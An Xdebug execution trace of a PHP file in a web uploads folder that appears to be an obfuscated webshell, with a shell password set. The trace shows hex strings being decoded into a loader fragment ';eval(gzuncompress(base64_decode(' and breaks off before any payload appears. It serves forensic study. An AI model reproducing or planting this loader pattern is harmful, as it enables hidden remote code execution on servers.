Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:48:07.867793]
1	0	1	0.000242	393512
1	3	0	0.000488	460776	{main}	1		/var/www/html/uploads/baru.php	0	0
1		A						/var/www/html/uploads/baru.php	2	$password = 'will'
1		A						/var/www/html/uploads/baru.php	3	$shellname = 'will'
1		A						/var/www/html/uploads/baru.php	4	$myurl = NULL
2	4	0	0.000539	460776	error_reporting	0		/var/www/html/uploads/baru.php	5	1	0
2	4	1	0.000553	460816
2	4	R			22527
2	5	0	0.000567	460776	set_time_limit	0		/var/www/html/uploads/baru.php	6	1	0
2	5	1	0.000582	460840
2	5	R			FALSE
2	6	0	0.000596	460808	header	0		/var/www/html/uploads/baru.php	15	1	'content-Type: text/html; charset=gb2312'
2	6	1	0.000613	460984
2	6	R			NULL
2	7	0	0.000627	460952	Class_UC_key	1		/var/www/html/uploads/baru.php	16	1	'2470617373776F72643D27'
3	8	0	0.000641	460952	trim	0		/var/www/html/uploads/baru.php	8	1	'2470617373776F72643D27'
3	8	1	0.000655	460984
3	8	R			'2470617373776F72643D27'
2		A						/var/www/html/uploads/baru.php	8	$array = 22
2		A						/var/www/html/uploads/baru.php	9	$debuger = ''
2		A						/var/www/html/uploads/baru.php	10	$one = 0
3	9	0	0.000699	460952	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	0	2
3	9	1	0.000714	461080
3	9	R			'24'
3	10	0	0.000727	460984	hexdec	0		/var/www/html/uploads/baru.php	11	1	'24'
3	10	1	0.000740	461032
3	10	R			36
3	11	0	0.000753	460952	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	36
3	11	1	0.000765	461048
3	11	R			'$'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '$'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	12	0	0.000799	460984	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	2	2
3	12	1	0.000813	461112
3	12	R			'70'
3	13	0	0.000825	461016	hexdec	0		/var/www/html/uploads/baru.php	11	1	'70'
3	13	1	0.000837	461064
3	13	R			112
3	14	0	0.000849	460984	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	112
3	14	1	0.000862	461080
3	14	R			'p'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'p'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	15	0	0.000893	460984	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	4	2
3	15	1	0.000907	461112
3	15	R			'61'
3	16	0	0.000919	461016	hexdec	0		/var/www/html/uploads/baru.php	11	1	'61'
3	16	1	0.000931	461064
3	16	R			97
3	17	0	0.000943	460984	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	97
3	17	1	0.000955	461080
3	17	R			'a'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'a'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	18	0	0.000986	460984	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	6	2
3	18	1	0.001000	461112
3	18	R			'73'
3	19	0	0.001013	461016	hexdec	0		/var/www/html/uploads/baru.php	11	1	'73'
3	19	1	0.001024	461064
3	19	R			115
3	20	0	0.001037	460984	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	115
3	20	1	0.001049	461080
3	20	R			's'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 's'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	21	0	0.001080	460984	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	8	2
3	21	1	0.001093	461112
3	21	R			'73'
3	22	0	0.001105	461016	hexdec	0		/var/www/html/uploads/baru.php	11	1	'73'
3	22	1	0.001117	461064
3	22	R			115
3	23	0	0.001129	460984	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	115
3	23	1	0.001141	461080
3	23	R			's'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 's'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	24	0	0.001172	460984	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	10	2
3	24	1	0.001185	461112
3	24	R			'77'
3	25	0	0.001197	461016	hexdec	0		/var/www/html/uploads/baru.php	11	1	'77'
3	25	1	0.001209	461064
3	25	R			119
3	26	0	0.001221	460984	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	119
3	26	1	0.001239	461080
3	26	R			'w'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'w'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	27	0	0.001270	460984	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	12	2
3	27	1	0.001283	461112
3	27	R			'6F'
3	28	0	0.001295	461016	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6F'
3	28	1	0.001308	461064
3	28	R			111
3	29	0	0.001320	460984	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	111
3	29	1	0.001332	461080
3	29	R			'o'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'o'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	30	0	0.001362	460984	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	14	2
3	30	1	0.001375	461112
3	30	R			'72'
3	31	0	0.001387	461016	hexdec	0		/var/www/html/uploads/baru.php	11	1	'72'
3	31	1	0.001399	461064
3	31	R			114
3	32	0	0.001411	460984	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	114
3	32	1	0.001422	461080
3	32	R			'r'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'r'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	33	0	0.001453	460992	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	16	2
3	33	1	0.001466	461120
3	33	R			'64'
3	34	0	0.001478	461024	hexdec	0		/var/www/html/uploads/baru.php	11	1	'64'
3	34	1	0.001490	461072
3	34	R			100
3	35	0	0.001502	460992	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	100
3	35	1	0.001514	461088
3	35	R			'd'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'd'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	36	0	0.001544	460992	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	18	2
3	36	1	0.001557	461120
3	36	R			'3D'
3	37	0	0.001570	461024	hexdec	0		/var/www/html/uploads/baru.php	11	1	'3D'
3	37	1	0.001581	461072
3	37	R			61
3	38	0	0.001594	460992	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	61
3	38	1	0.001606	461088
3	38	R			'='
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '='
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	39	0	0.001636	460992	substr	0		/var/www/html/uploads/baru.php	11	3	'2470617373776F72643D27'	20	2
3	39	1	0.001650	461120
3	39	R			'27'
3	40	0	0.001662	461024	hexdec	0		/var/www/html/uploads/baru.php	11	1	'27'
3	40	1	0.001673	461072
3	40	R			39
3	41	0	0.001685	460992	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	39
3	41	1	0.001697	461088
3	41	R			'\''
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '\''
2		A						/var/www/html/uploads/baru.php	10	$one += 2
2	7	1	0.001728	460992
2	7	R			'$password=\''
2	42	0	0.001743	460992	Class_UC_key	1		/var/www/html/uploads/baru.php	17	1	'273B247368656C6C6E616D653D27'
3	43	0	0.001756	460992	trim	0		/var/www/html/uploads/baru.php	8	1	'273B247368656C6C6E616D653D27'
3	43	1	0.001769	461024
3	43	R			'273B247368656C6C6E616D653D27'
2		A						/var/www/html/uploads/baru.php	8	$array = 28
2		A						/var/www/html/uploads/baru.php	9	$debuger = ''
2		A						/var/www/html/uploads/baru.php	10	$one = 0
3	44	0	0.001812	460992	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	0	2
3	44	1	0.001826	461120
3	44	R			'27'
3	45	0	0.001838	461024	hexdec	0		/var/www/html/uploads/baru.php	11	1	'27'
3	45	1	0.001850	461072
3	45	R			39
3	46	0	0.001862	460992	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	39
3	46	1	0.001874	461088
3	46	R			'\''
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '\''
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	47	0	0.001906	461024	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	2	2
3	47	1	0.001919	461152
3	47	R			'3B'
3	48	0	0.001932	461056	hexdec	0		/var/www/html/uploads/baru.php	11	1	'3B'
3	48	1	0.001944	461104
3	48	R			59
3	49	0	0.001956	461024	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	59
3	49	1	0.001972	461120
3	49	R			';'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= ';'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	50	0	0.002004	461024	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	4	2
3	50	1	0.002017	461152
3	50	R			'24'
3	51	0	0.002030	461056	hexdec	0		/var/www/html/uploads/baru.php	11	1	'24'
3	51	1	0.002042	461104
3	51	R			36
3	52	0	0.002054	461024	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	36
3	52	1	0.002066	461120
3	52	R			'$'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '$'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	53	0	0.002097	461024	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	6	2
3	53	1	0.002110	461152
3	53	R			'73'
3	54	0	0.002123	461056	hexdec	0		/var/www/html/uploads/baru.php	11	1	'73'
3	54	1	0.002134	461104
3	54	R			115
3	55	0	0.002146	461024	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	115
3	55	1	0.002158	461120
3	55	R			's'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 's'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	56	0	0.002189	461024	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	8	2
3	56	1	0.002203	461152
3	56	R			'68'
3	57	0	0.002215	461056	hexdec	0		/var/www/html/uploads/baru.php	11	1	'68'
3	57	1	0.002226	461104
3	57	R			104
3	58	0	0.002238	461024	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	104
3	58	1	0.002250	461120
3	58	R			'h'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'h'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	59	0	0.002281	461024	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	10	2
3	59	1	0.002295	461152
3	59	R			'65'
3	60	0	0.002307	461056	hexdec	0		/var/www/html/uploads/baru.php	11	1	'65'
3	60	1	0.002318	461104
3	60	R			101
3	61	0	0.002330	461024	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	101
3	61	1	0.002342	461120
3	61	R			'e'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'e'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	62	0	0.002373	461024	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	12	2
3	62	1	0.002386	461152
3	62	R			'6C'
3	63	0	0.002399	461056	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6C'
3	63	1	0.002410	461104
3	63	R			108
3	64	0	0.002422	461024	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	108
3	64	1	0.002434	461120
3	64	R			'l'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'l'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	65	0	0.002465	461024	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	14	2
3	65	1	0.002478	461152
3	65	R			'6C'
3	66	0	0.002491	461056	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6C'
3	66	1	0.002502	461104
3	66	R			108
3	67	0	0.002514	461024	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	108
3	67	1	0.002526	461120
3	67	R			'l'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'l'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	68	0	0.002557	461032	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	16	2
3	68	1	0.002570	461160
3	68	R			'6E'
3	69	0	0.002583	461064	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6E'
3	69	1	0.002594	461112
3	69	R			110
3	70	0	0.002607	461032	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	110
3	70	1	0.002618	461128
3	70	R			'n'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'n'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	71	0	0.002649	461032	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	18	2
3	71	1	0.002663	461160
3	71	R			'61'
3	72	0	0.002675	461064	hexdec	0		/var/www/html/uploads/baru.php	11	1	'61'
3	72	1	0.002686	461112
3	72	R			97
3	73	0	0.002698	461032	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	97
3	73	1	0.002714	461128
3	73	R			'a'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'a'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	74	0	0.002744	461032	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	20	2
3	74	1	0.002758	461160
3	74	R			'6D'
3	75	0	0.002770	461064	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6D'
3	75	1	0.002782	461112
3	75	R			109
3	76	0	0.002794	461032	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	109
3	76	1	0.002806	461128
3	76	R			'm'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'm'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	77	0	0.002836	461032	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	22	2
3	77	1	0.002849	461160
3	77	R			'65'
3	78	0	0.002861	461064	hexdec	0		/var/www/html/uploads/baru.php	11	1	'65'
3	78	1	0.002873	461112
3	78	R			101
3	79	0	0.002885	461032	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	101
3	79	1	0.002897	461128
3	79	R			'e'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'e'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	80	0	0.002927	461032	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	24	2
3	80	1	0.002941	461160
3	80	R			'3D'
3	81	0	0.002953	461064	hexdec	0		/var/www/html/uploads/baru.php	11	1	'3D'
3	81	1	0.002965	461112
3	81	R			61
3	82	0	0.002977	461032	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	61
3	82	1	0.002989	461128
3	82	R			'='
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '='
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	83	0	0.003019	461032	substr	0		/var/www/html/uploads/baru.php	11	3	'273B247368656C6C6E616D653D27'	26	2
3	83	1	0.003032	461160
3	83	R			'27'
3	84	0	0.003045	461064	hexdec	0		/var/www/html/uploads/baru.php	11	1	'27'
3	84	1	0.003056	461112
3	84	R			39
3	85	0	0.003068	461032	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	39
3	85	1	0.003080	461128
3	85	R			'\''
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '\''
2		A						/var/www/html/uploads/baru.php	10	$one += 2
2	42	1	0.003111	461032
2	42	R			'\';$shellname=\''
2	86	0	0.003127	461008	Class_UC_key	1		/var/www/html/uploads/baru.php	18	1	'273B246D7975726C3D27'
3	87	0	0.003140	461008	trim	0		/var/www/html/uploads/baru.php	8	1	'273B246D7975726C3D27'
3	87	1	0.003153	461040
3	87	R			'273B246D7975726C3D27'
2		A						/var/www/html/uploads/baru.php	8	$array = 20
2		A						/var/www/html/uploads/baru.php	9	$debuger = ''
2		A						/var/www/html/uploads/baru.php	10	$one = 0
3	88	0	0.003195	461008	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	0	2
3	88	1	0.003208	461136
3	88	R			'27'
3	89	0	0.003221	461040	hexdec	0		/var/www/html/uploads/baru.php	11	1	'27'
3	89	1	0.003232	461088
3	89	R			39
3	90	0	0.003245	461008	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	39
3	90	1	0.003256	461104
3	90	R			'\''
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '\''
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	91	0	0.003288	461040	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	2	2
3	91	1	0.003301	461168
3	91	R			'3B'
3	92	0	0.003313	461072	hexdec	0		/var/www/html/uploads/baru.php	11	1	'3B'
3	92	1	0.003325	461120
3	92	R			59
3	93	0	0.003337	461040	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	59
3	93	1	0.003350	461136
3	93	R			';'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= ';'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	94	0	0.003381	461040	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	4	2
3	94	1	0.003394	461168
3	94	R			'24'
3	95	0	0.003407	461072	hexdec	0		/var/www/html/uploads/baru.php	11	1	'24'
3	95	1	0.003418	461120
3	95	R			36
3	96	0	0.003430	461040	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	36
3	96	1	0.003455	461136
3	96	R			'$'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '$'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	97	0	0.003487	461040	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	6	2
3	97	1	0.003500	461168
3	97	R			'6D'
3	98	0	0.003513	461072	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6D'
3	98	1	0.003525	461120
3	98	R			109
3	99	0	0.003537	461040	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	109
3	99	1	0.003549	461136
3	99	R			'm'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'm'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	100	0	0.003580	461040	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	8	2
3	100	1	0.003594	461168
3	100	R			'79'
3	101	0	0.003606	461072	hexdec	0		/var/www/html/uploads/baru.php	11	1	'79'
3	101	1	0.003618	461120
3	101	R			121
3	102	0	0.003630	461040	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	121
3	102	1	0.003642	461136
3	102	R			'y'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'y'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	103	0	0.003673	461040	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	10	2
3	103	1	0.003686	461168
3	103	R			'75'
3	104	0	0.003698	461072	hexdec	0		/var/www/html/uploads/baru.php	11	1	'75'
3	104	1	0.003710	461120
3	104	R			117
3	105	0	0.003722	461040	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	117
3	105	1	0.003734	461136
3	105	R			'u'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'u'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	106	0	0.003765	461040	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	12	2
3	106	1	0.003778	461168
3	106	R			'72'
3	107	0	0.003790	461072	hexdec	0		/var/www/html/uploads/baru.php	11	1	'72'
3	107	1	0.003802	461120
3	107	R			114
3	108	0	0.003815	461040	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	114
3	108	1	0.003827	461136
3	108	R			'r'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'r'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	109	0	0.003857	461040	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	14	2
3	109	1	0.003871	461168
3	109	R			'6C'
3	110	0	0.003883	461072	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6C'
3	110	1	0.003895	461120
3	110	R			108
3	111	0	0.003907	461040	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	108
3	111	1	0.003920	461136
3	111	R			'l'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'l'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	112	0	0.003950	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	16	2
3	112	1	0.003964	461176
3	112	R			'3D'
3	113	0	0.003976	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'3D'
3	113	1	0.003988	461128
3	113	R			61
3	114	0	0.004000	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	61
3	114	1	0.004012	461144
3	114	R			'='
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '='
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	115	0	0.004043	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B246D7975726C3D27'	18	2
3	115	1	0.004057	461176
3	115	R			'27'
3	116	0	0.004071	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'27'
3	116	1	0.004083	461128
3	116	R			39
3	117	0	0.004110	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	39
3	117	1	0.004123	461144
3	117	R			'\''
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '\''
2		A						/var/www/html/uploads/baru.php	10	$one += 2
2	86	1	0.004157	461048
2	86	R			'\';$myurl=\''
2	118	0	0.004172	461016	Class_UC_key	1		/var/www/html/uploads/baru.php	19	1	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'
3	119	0	0.004188	461016	trim	0		/var/www/html/uploads/baru.php	8	1	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'
3	119	1	0.004206	461048
3	119	R			'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'
2		A						/var/www/html/uploads/baru.php	8	$array = 70
2		A						/var/www/html/uploads/baru.php	9	$debuger = ''
2		A						/var/www/html/uploads/baru.php	10	$one = 0
3	120	0	0.004252	461016	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	0	2
3	120	1	0.004267	461144
3	120	R			'27'
3	121	0	0.004280	461048	hexdec	0		/var/www/html/uploads/baru.php	11	1	'27'
3	121	1	0.004291	461096
3	121	R			39
3	122	0	0.004304	461016	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	39
3	122	1	0.004315	461112
3	122	R			'\''
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '\''
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	123	0	0.004347	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	2	2
3	123	1	0.004362	461176
3	123	R			'3B'
3	124	0	0.004374	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'3B'
3	124	1	0.004386	461128
3	124	R			59
3	125	0	0.004398	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	59
3	125	1	0.004410	461144
3	125	R			';'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= ';'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	126	0	0.004442	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	4	2
3	126	1	0.004456	461176
3	126	R			'65'
3	127	0	0.004469	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'65'
3	127	1	0.004481	461128
3	127	R			101
3	128	0	0.004493	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	101
3	128	1	0.004505	461144
3	128	R			'e'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'e'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	129	0	0.004536	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	6	2
3	129	1	0.004551	461176
3	129	R			'76'
3	130	0	0.004564	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'76'
3	130	1	0.004576	461128
3	130	R			118
3	131	0	0.004588	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	118
3	131	1	0.004600	461144
3	131	R			'v'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'v'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	132	0	0.004633	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	8	2
3	132	1	0.004660	461176
3	132	R			'61'
3	133	0	0.004673	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'61'
3	133	1	0.004687	461128
3	133	R			97
3	134	0	0.004699	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	97
3	134	1	0.004711	461144
3	134	R			'a'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'a'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	135	0	0.004742	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	10	2
3	135	1	0.004756	461176
3	135	R			'6C'
3	136	0	0.004769	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6C'
3	136	1	0.004781	461128
3	136	R			108
3	137	0	0.004793	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	108
3	137	1	0.004805	461144
3	137	R			'l'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'l'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	138	0	0.004836	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	12	2
3	138	1	0.004851	461176
3	138	R			'28'
3	139	0	0.004863	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'28'
3	139	1	0.004875	461128
3	139	R			40
3	140	0	0.004888	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	40
3	140	1	0.004899	461144
3	140	R			'('
2		A						/var/www/html/uploads/baru.php	11	$debuger .= '('
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	141	0	0.004935	461048	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	14	2
3	141	1	0.004950	461176
3	141	R			'67'
3	142	0	0.004963	461080	hexdec	0		/var/www/html/uploads/baru.php	11	1	'67'
3	142	1	0.004975	461128
3	142	R			103
3	143	0	0.004987	461048	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	103
3	143	1	0.004999	461144
3	143	R			'g'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'g'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	144	0	0.005030	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	16	2
3	144	1	0.005044	461184
3	144	R			'7A'
3	145	0	0.005057	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'7A'
3	145	1	0.005069	461136
3	145	R			122
3	146	0	0.005081	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	122
3	146	1	0.005093	461152
3	146	R			'z'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'z'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	147	0	0.005124	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	18	2
3	147	1	0.005139	461184
3	147	R			'75'
3	148	0	0.005151	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'75'
3	148	1	0.005163	461136
3	148	R			117
3	149	0	0.005175	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	117
3	149	1	0.005188	461152
3	149	R			'u'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'u'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	150	0	0.005218	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	20	2
3	150	1	0.005233	461184
3	150	R			'6E'
3	151	0	0.005246	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'6E'
3	151	1	0.005257	461136
3	151	R			110
3	152	0	0.005270	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	110
3	152	1	0.005282	461152
3	152	R			'n'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'n'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	153	0	0.005313	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	22	2
3	153	1	0.005327	461184
3	153	R			'63'
3	154	0	0.005340	461088	hexdec	0		/var/www/html/uploads/baru.php	11	1	'63'
3	154	1	0.005352	461136
3	154	R			99
3	155	0	0.005364	461056	pack	0		/var/www/html/uploads/baru.php	11	2	'C'	99
3	155	1	0.005376	461152
3	155	R			'c'
2		A						/var/www/html/uploads/baru.php	11	$debuger .= 'c'
2		A						/var/www/html/uploads/baru.php	10	$one += 2
3	156	0	0.005406	461056	substr	0		/var/www/html/uploads/baru.php	11	3	'273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827'	24	2
3	156	1	0.005421	461184
3	156	R			'6F'
